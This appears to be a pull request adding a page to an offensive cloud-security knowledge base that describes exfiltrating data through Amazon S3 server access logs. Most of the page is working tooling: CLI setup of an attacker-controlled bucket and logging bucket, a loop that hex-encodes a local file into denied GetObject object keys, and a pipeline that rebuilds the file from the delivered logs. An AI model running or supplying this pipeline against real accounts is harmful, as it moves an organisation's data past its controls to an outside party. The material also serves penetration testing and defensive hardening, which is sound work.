Merge pull request #303 from costasko/s3_server_access_logs
S3 server access logs
Frichetten authored Dec 8, 2023
2 parents f701793 + 5a918c3 commit 5c9c543
Showing 1 changed file with 53 additions and 0 deletions: content/aws/exploitation/s3_server_access_logs.md
@@ -0,0 +1,53 @@
---
author_name: Costas Kourmpoglou
title: Data Exfiltration through S3 Server Access Logs
description: Exfiltrate data via s3:GetObject and S3 server access logs.
---

# Data Exfiltration through S3 Server Access Logs

<div class="grid cards" markdown>

- :material-account:{ .lg .middle } __Original Research__

---

<aside style="display:flex">
<p><a href="https://airwalkreply.com/cloud-services-as-exfiltration-mechanisms">Cloud services as exfiltration mechanisms</a> by <a href="https://www.linkedin.com/in/costas-kou/">Costas Kourmpoglou</a></p>
</aside>

</div>

If we control an IAM identity that allows `s3:GetObject`, then, depending on our network access to the S3 service, we can send requests to an S3 bucket _we_ control that has server access logging enabled, and use those logs to exfiltrate data.

With server access logging, every request to our S3 bucket is logged to a separate logging bucket. This includes internal AWS requests and requests made via the AWS console.
Even if a request is denied, the payload it carries is still written to our logging bucket. We can therefore send `GetObject` requests to an S3 bucket we don't have access to; because we control its server access logs, we still receive the data we want to exfiltrate.

# How

We'll create an S3 bucket, `AttackerBucket`, in our account with [server access logging](https://docs.aws.amazon.com/AmazonS3/latest/userguide/ServerLogs.html) enabled, and name the logging bucket `AttackerBucketLogs`.
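
A minimal setup sketch with the AWS CLI, assuming the hypothetical bucket names above (lowercased, since real S3 bucket names must be lowercase) and the `logging.s3.amazonaws.com` service principal for log delivery:

```
aws s3api create-bucket --bucket attackerbucket --region us-east-1
aws s3api create-bucket --bucket attackerbucketlogs --region us-east-1

# Allow the S3 log delivery service to write access logs into the logging bucket
aws s3api put-bucket-policy --bucket attackerbucketlogs --policy '{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": {"Service": "logging.s3.amazonaws.com"},
    "Action": "s3:PutObject",
    "Resource": "arn:aws:s3:::attackerbucketlogs/*"
  }]
}'

# Point AttackerBucket's server access logs at the logging bucket
aws s3api put-bucket-logging --bucket attackerbucket --bucket-logging-status '{
  "LoggingEnabled": {"TargetBucket": "attackerbucketlogs", "TargetPrefix": "logs/"}
}'
```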
With the data we want to exfiltrate as the object key, `ExampleDataToExfiltrate`, we send a `GetObject` request to our bucket, for example:

`aws s3api get-object --bucket AttackerBucket --key ExampleDataToExfiltrate outfile`

The request will be denied. However, the attempt, along with other details, including our key `ExampleDataToExfiltrate` (the data we're exfiltrating), will arrive in our logging bucket `AttackerBucketLogs`.

We'll receive the data in the default logging format:

```
[..] attackerbucket [..] 8.8.8.8 - [..] REST.GET.OBJECT ExampleDataToExfiltrate "GET /ExampleDataToExfiltrate HTTP/1.1" 403 AccessDenied 243 - 18 - "-" "UserAgentAlsoHasData" - [..]
```

We're exfiltrating data using the Key parameter of the request. There's a hard limit of 1024 bytes per key, but other request fields, such as the User-Agent header, can carry data as well.
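
As an illustration of working within that limit (not from the original write-up), here's a rough sender sketch: it hex-encodes a file so the key stays URL-safe, splits it into chunks well under 1024 bytes, and prefixes each chunk with a zero-padded sequence number. The file name, chunk size, and `exfil/` key prefix are arbitrary choices.

```
# Hex-encode the data (URL-safe characters only), split it into chunks,
# and smuggle each chunk out as an object key. Every request will be denied,
# but the keys still land in AttackerBucketLogs.
i=0
for chunk in $(xxd -p ./secret.bin | tr -d '\n' | fold -w 900); do
  aws s3api get-object \
    --bucket attackerbucket \
    --key "exfil/$(printf '%06d' "$i")-${chunk}" \
    /dev/null 2>/dev/null
  i=$((i + 1))
done
```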

# Challenges

There are two challenges with this method:

1. If network access to the S3 service takes place over a VPC endpoint, the endpoint policy needs to allow access to our bucket.
If it doesn't, the VPC endpoint drops the request without forwarding it to the S3 service; no log is generated and no data is exfiltrated.

2. The logs are not guaranteed to arrive in order. If you're splitting data across multiple requests, you'll need a mechanism to re-order the data correctly, for example a sequence-number prefix on each key (see the sender sketch above and the receiver sketch below).

For the general use case where network access to the S3 service takes place over the internet, there is a 10-120 minute delay in log delivery.
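
Once the logs have been delivered, reassembly on the receiving side is straightforward because each key carries its own sequence number. A hedged receiver sketch matching the sender above:

```
# Pull down the access logs, extract the keys from REST.GET.OBJECT records,
# sort them by the zero-padded sequence prefix, strip the prefix, and decode.
aws s3 sync s3://attackerbucketlogs/logs/ ./logs/

grep -h 'REST.GET.OBJECT exfil/' ./logs/* \
  | awk '{for (i = 1; i <= NF; i++) if ($i == "REST.GET.OBJECT") print $(i + 1)}' \
  | sort -u \
  | sed 's|^exfil/[0-9]*-||' \
  | tr -d '\n' \
  | xxd -r -p > recovered.bin
```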
